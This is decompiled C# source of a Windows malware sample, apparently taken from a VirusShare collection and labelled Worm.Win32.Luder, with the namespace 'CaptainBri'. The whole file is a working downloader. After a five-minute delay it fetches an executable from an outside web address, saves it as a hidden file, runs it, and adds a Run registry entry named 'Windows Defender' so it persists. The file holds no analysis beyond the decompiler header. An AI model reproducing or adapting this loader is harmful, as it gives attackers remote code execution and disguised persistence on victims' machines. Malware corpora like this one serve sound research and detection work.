// Decompiled with JetBrains decompiler // Type: CaptainBri.Program // Assembly: downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 0E31E51F-2748-4D91-852B-4BE7B4A0BDF2 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4.exe using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.Net; using System.Threading; namespace CaptainBri { internal static class Program { private static void Main() { try { Thread.Sleep(300000); string str = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\downloaded.exe"; new WebClient().DownloadFile("http://endoftheinternet.fileave.com/BIN/SN/dllhost.exe", str); System.IO.File.SetAttributes(str, FileAttributes.Hidden); Process.Start(str); Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Windows Defender", (object) str); } catch { } } } }